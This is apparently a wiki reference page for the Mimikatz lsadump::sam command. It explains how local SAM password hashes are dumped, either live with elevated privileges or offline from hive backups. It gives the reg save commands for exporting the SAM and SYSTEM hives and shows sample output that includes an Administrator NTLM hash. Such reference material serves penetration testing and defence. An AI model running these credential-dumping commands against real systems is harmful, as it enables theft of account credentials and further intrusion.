sam

lsadump::sam dumps the local Security Account Manager (SAM) NT hashes (cf. SAM secrets dump). It can operate directly on the target system, or offline with registry hives backups (for SAM and SYSTEM). It has the following command line arguments:

  • /sam: the offline backup of the SAM hive

  • /system: the offline backup of the SYSTEM hive

LM and NT hashes are used to authenticate accounts using the NTLM protocol. These hashes are often called NTLM hash and many documentations, resources, blogpost and tools mix terms. In this case, "NTLM" refers to the NT hash.

(more information)

This command requires elevated privileges (by previously running privilege::debug or by executing Mimikatz as the NT-AUTHORITY\SYSTEM account).

Dumping the target

mimikatz # lsadump::sam
Domain : DC
SysKey : 7852ea75b3b8c4093fbda3f618a045bb
Local SID : S-1-5-21-97532702-2134717100-614679475

SAMKey : 7a87c9ff42815d7d1cead9fe84db22ba

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 4d01f91984530f183381bdf5f0605f63

RID  : 000001f5 (501)
User : Guest

RID  : 000001f7 (503)
User : DefaultAccount

Offline dumping

At first a backup ofSYSTEM and SAM hives must be obtained:

reg save HKLM\SYSTEM system.hive
reg save HKLM\SAM sam.hive

A Volume Shadow Copy / BootCD can also be used to backup these files:

C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\SAM

Then the saved backups of SYSTEM and SAM hives can also be used offline:

mimikatz # lsadump::sam /system:system.hive /sam:sam.hive
PreviousrpdataNextsecrets

Last updated